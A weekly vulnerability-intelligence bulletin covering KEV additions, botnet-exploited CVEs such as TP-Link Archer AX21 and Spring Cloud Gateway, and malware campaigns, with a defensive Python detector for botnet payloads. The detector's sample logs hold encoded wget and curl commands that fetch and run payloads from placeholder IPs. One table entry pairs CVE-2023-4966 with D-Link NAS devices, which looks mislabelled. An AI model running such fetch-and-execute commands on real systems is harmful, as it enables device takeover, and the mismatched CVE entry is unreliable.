Critical vulnerabilities amidst Ransomware and Botnet threats

September 27, 2024
Executive Summary

In an unexpected turn, only one new vulnerability was added to the CISA KEV list this week, a significant drop from last week's addition of 11 CVEs. The lone addition, CVE-2024-7593, is a critical authentication bypass vulnerability affecting Ivanti's Virtual Traffic Manager (vTM). Meanwhile, critical vulnerabilities in Cisco's Smart Licensing Utility and Cellopoint's Secure Email Gateway have drawn significant attention, as publicly available proof-of-concept exploits have made these flaws increasingly attractive to threat actors.

For the third consecutive week, the Mirai botnet has been relentlessly targeting TP-Link Archer AX21 routers, showcasing its tenacity in exploiting consumer devices. At the same time, the Sysrv and Enemy botnets have been observed actively exploiting vulnerabilities in Spring Cloud Gateway, further expanding their reach. Meanwhile, the IoT_Reaper botnet remains active, persistently exploiting an eight-year-old vulnerability in MVPower CCTV DVR models.

Trending / Critical Vulnerabilities

Current trending vulnerabilities offer insight into the latest emerging and widely discussed threats, helping defenders prioritize and make informed decisions.

CVE-2024-7593

An authentication bypass vulnerability in Ivanti's Virtual Traffic Manager (vTM), arising from an improperly implemented authentication algorithm, enables remote attackers to bypass the security measures of the admin panel. With a CVSS score of 9.8, a high EPSS score of 0.97325 and a readily available proof of concept, it has now been added to the CISA KEV list.

CVE-2024-7490

A critical vulnerability in the Microchip Advanced Software Framework (ASF), affecting versions 3.52.0.2574 and earlier, arises from its implementation of the Tinydhcp server, allowing remote attackers to execute arbitrary code through specially crafted DHCP request packets sent to a multicast address on the affected systems.  

CVE-2024-20439

A critical vulnerability in Cisco Smart Licensing Utility (CSLU) versions 2.0.0, 2.1.0, and 2.2.0 allows unauthenticated attackers to bypass authentication and gain administrative access. This vulnerability, which arises from a hidden static user credential, could allow attackers to manipulate licensing data or launch further attacks within the network. Despite its low EPSS score of 0.16329, the availability of a proof-of-concept exploit makes this vulnerability a significant threat.

CVE-2024-9043

A buffer overflow vulnerability in the Cellopoint Secure Email Gateway can be exploited by remote attackers, allowing them to access sensitive email communications, install malware, exfiltrate data, and disable essential security measures, thereby exposing the network to further threats. The existence of a proof of concept increases the risk of exploitation, underscoring the urgent need for immediate remediation.

Exploit Activity and Mass Scanning Observed on Cytellite Sensors

Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.

| Vulnerability | Product | Severity | Title | Exploited in-the-wild | CISA KEV |
|---|---|---|---|---|---|
| CVE-2024-4577 | PHP-CGI on Windows | High | Critical argument injection vulnerability in PHP on Windows servers | True | True |
| CVE-2024-36401 | GeoServer | Critical | Code Injection vulnerability in GeoServer leads to remote code execution | True | True |
| CVE-2023-4415 | Ruijie RG-EW1200G 07161417 r483 | High | Improper Authentication vulnerability in Ruijie RG-EW1200G 07161417 r483 | False | False |
| CVE-2023-4966 | D-Link NAS devices | Critical | Command Injection Vulnerability in D-Link NAS devices | True | True |
| CVE-2023-38646 | Metabase open source and Metabase Enterprise | Critical | Remote code execution vulnerability in Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 | True | True |
| CVE-2023-26801 | LB-LINK | Critical | Command injection vulnerability in LB-LINK devices | True | False |
| CVE-2023-1389 | TP-Link Archer AX-21 | High | Command Injection Vulnerability in TP-Link Archer AX-21 | True | True |
| CVE-2022-34045 | Wavlink Devices | Critical | Hardcoded encryption/decryption key vulnerability in Wavlink | False | False |
| CVE-2022-30489 | Wavlink Devices | Medium | Cross-site scripting vulnerability in Wavlink Devices | False | False |
| CVE-2022-30023 | Tenda Devices | High | Command injection vulnerability via the Ping function in Tenda Products | False | False |
| CVE-2022-25168 | Apache Hadoop | Critical | Command injection vulnerability in org.apache.hadoop.fs.FileUtil.unTarUsingTar in Apache Hadoop | False | False |
| CVE-2022-41040 | Microsoft Exchange Server | High | Server-Side Request Forgery Vulnerability in Microsoft Exchange Server | True | True |
| CVE-2022-22947 | Spring Cloud Gateway | Critical | Remote code execution vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ | True | True |

Vulnerabilities abused by Botnet

This section lists vulnerabilities identified as exploited by botnets, including recent CVEs logged in MISP. It presents the top 5 CVEs whose payloads are suggestive of botnet activity, such as invoking wget against raw IP addresses.

| Vulnerability | Product | Title | Exploit | Abused by Botnet |
|---|---|---|---|---|
| CVE-2023-1389 | TP-Link Archer AX21 | An unauthenticated command injection vulnerability found in the TP-Link Archer AX21 WiFi router | True | AGoent, Gafgyt, Moobot, Miori, Mirai, Condi |
| CVE-2022-22947 | Spring Cloud Gateway | Remote code execution vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ | True | Enemybot, GuardMiner, Sysrv-botnet |
| CVE-2016-20016 | MVPower CCTV DVR models | Remote code execution vulnerability in MVPower CCTV DVR models | True | IoT-Reaper |
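The heuristic described above (a request payload that calls wget or curl against a raw IP address) can be turned into a simple triage filter over sensor logs. The following Python script is an added example, not Loginsoft's or the Cytellite sensor's own code: the tab-separated log format, the field names and every sample line are constructed here, and all addresses come from the RFC 5737 documentation ranges. It URL-decodes each payload (scanners frequently encode or double-encode the command), splits the result on shell separators, and only flags a command in which a downloader and an IPv4 literal occur together, then groups the hits by the staging host being fetched from, which is the view that makes a spreader serving many bots stand out.

```python
import re
from urllib.parse import unquote_plus

# Constructed sensor log lines (not real telemetry): timestamp, source IP,
# method, path and the request payload (query string or body), tab-separated.
SAMPLE_LOG = [
    "\t".join(["2024-09-24T10:15:02Z", "203.0.113.7", "POST", "/cgi-bin/example.cgi",
               "host=%24%28wget+http%3A%2F%2F198.51.100.23%2Fbins%2Fx86+-O+%2Ftmp%2Fx"
               "%3Bchmod+777+%2Ftmp%2Fx%3B%2Ftmp%2Fx%29"]),
    "\t".join(["2024-09-24T10:15:09Z", "203.0.113.8", "GET", "/shell",
               "cmd=curl%20-s%20http%3A%2F%2F192.0.2.10%2Fpayload.sh%7Csh"]),
    "\t".join(["2024-09-24T10:16:41Z", "203.0.113.9", "GET", "/cgi-bin/example.cgi",
               "host=%3Bwget%20http%3A%2F%2F198.51.100.23%2Fbins%2Fmips%3B"]),
    # Benign or ambiguous lines the heuristic must not flag:
    "\t".join(["2024-09-24T10:17:00Z", "198.51.100.77", "GET", "/docs",
               "q=how+to+use+wget+with+github.com"]),                 # downloader, no IP literal
    "\t".join(["2024-09-24T10:17:30Z", "198.51.100.78", "POST", "/login",
               "user=admin&redirect=http%3A%2F%2F198.51.100.5%2F"]),  # IP literal, no downloader
    "\t".join(["2024-09-24T10:18:12Z", "198.51.100.79", "GET", "/shell",
               "cmd=wget+foo.sh%3Bping+192.0.2.1"]),                  # IP in a different command
]

# Dotted-quad IPv4 literal with each octet in 0..255.
IPV4_RE = re.compile(
    r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
)
# Downloaders commonly seen in botnet spreader payloads.
DOWNLOADER_RE = re.compile(r"\b(wget|curl|tftp)\b", re.IGNORECASE)
# Shell command separators: the IP literal only counts if it sits in the
# same command as the downloader.
COMMAND_SPLIT_RE = re.compile(r"[;&|`\n]+|\$\(")


def decode_payload(raw: str) -> str:
    """URL-decode a payload until it stops changing (double-encoding is common)."""
    current = raw
    for _ in range(3):
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current = decoded
    return current


def find_botnet_indicators(payload: str) -> list[tuple[str, str]]:
    """Return (downloader, ip) pairs for every command in the payload that
    invokes wget/curl/tftp against a literal IPv4 host."""
    hits = []
    for command in COMMAND_SPLIT_RE.split(decode_payload(payload)):
        tool = DOWNLOADER_RE.search(command)
        if not tool:
            continue
        ip = IPV4_RE.search(command, tool.end())
        if ip:
            hits.append((tool.group(1).lower(), ip.group(0)))
    return hits


def parse_line(line: str) -> dict:
    """Split one constructed sensor log line into its named fields."""
    ts, src, method, path, payload = line.rstrip("\n").split("\t", 4)
    return {"ts": ts, "src": src, "method": method, "path": path, "payload": payload}


def summarize(lines) -> dict[str, list[str]]:
    """Group flagged requests by the staging host they try to fetch from, so a
    single download server hit from many sources (a botnet spreader) stands out."""
    staging_hosts: dict[str, set[str]] = {}
    for line in lines:
        rec = parse_line(line)
        for _tool, host in find_botnet_indicators(rec["payload"]):
            staging_hosts.setdefault(host, set()).add(rec["src"])
    return {host: sorted(srcs) for host, srcs in staging_hosts.items()}


if __name__ == "__main__":
    for host, sources in summarize(SAMPLE_LOG).items():
        print(f"{host}: fetched by {len(sources)} source(s): {', '.join(sources)}")
```

A downloader pointed at a hostname (the fourth sample line) is deliberately not flagged: it is a much weaker signal than an IP literal and would produce noise from ordinary documentation traffic. The per-host grouping is what an analyst would pivot on next, for example to cross-reference the staging host against the sources listed in MISP.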

Vulnerabilities Abused by Malware

We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually analyzed and mapped to MITRE ATT&CK tactics and techniques. The information is sourced from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.

CVE-2024-36401

Recent investigations by Trend Micro have revealed that an eval injection vulnerability in GeoServer, which can lead to remote code execution, has been actively exploited by the Chinese threat actor Earth Baxia. This group has leveraged the flaw to deploy Cobalt Strike payloads and a custom backdoor called EAGLEDOOR. Historically, attackers have also exploited this vulnerability to deliver SideWalk malware, a sophisticated backdoor tied to the APT41 threat group. Moreover, the flaw has been used to spread Mirai variants such as JenX and the Condi DDoS bot.

CVE-2024-21338

SentinelLabs reported that an affiliate group associated with Mallox ransomware has exploited a privilege escalation vulnerability in the Windows kernel, using a Linux-based ransomware tool called Kryptina to gain elevated privileges. This strategic use of cross-platform tools enhanced the attackers' ability to deepen system access and amplified the overall impact of their ransomware operations.

| Vulnerability | Severity | Title | Patch | Targeted By Malware | OSS |
|---|---|---|---|---|---|
| CVE-2024-36401 | Critical | Eval Injection vulnerability in GeoServer leads to remote code execution | True | Earth Baxia | True |
| CVE-2024-21338 | High | Privilege Escalation vulnerability in Windows Kernel | True | Mallox, Kryptina | False |

PRE-NVD observed for this week

Pre-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

| CVE-ID | Type of Vulnerability | Product | Reference |
|---|---|---|---|
| CVE-2024-9114 | Out-Of-Bounds Write | FastStone Image Viewer | Resource |
| CVE-2024-9113 | Out-Of-Bounds Write | FastStone Image Viewer | Resource |
| CVE-2024-8849 | Out-Of-Bounds Read | PDF-XChange Editor | Resource |
| CVE-2024-8827 | Out-Of-Bounds Write | PDF-XChange Editor | Resource |
| CVE-2024-8808 | Command Injection | Cohesive Networks VNS3 | Resource |

External References

  1. https://www.cisa.gov/news-events/alerts/2024/09/24/cisa-adds-one-known-exploited-vulnerability-catalog
  2. https://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html
  3. https://www.darkreading.com/cyberattacks-data-breaches/china-earth-baxia-spies-geoserver-apac-orgs
  4. https://www.sentinelone.com/labs/kryptina-raas-from-unsellable-cast-off-to-enterprise-ransomware/
  5. https://www.fortinet.com/blog/threat-research/botnets-continue-exploiting-cve-2023-1389-for-wide-scale-spread
  6. https://thehackernews.com/2024/09/critical-flaw-in-microchip-asf-exposes.html
  7. https://securityonline.info/researcher-details-cve-2024-20439-cvss-9-8-flaw-in-cisco-smart-licensing-utility/
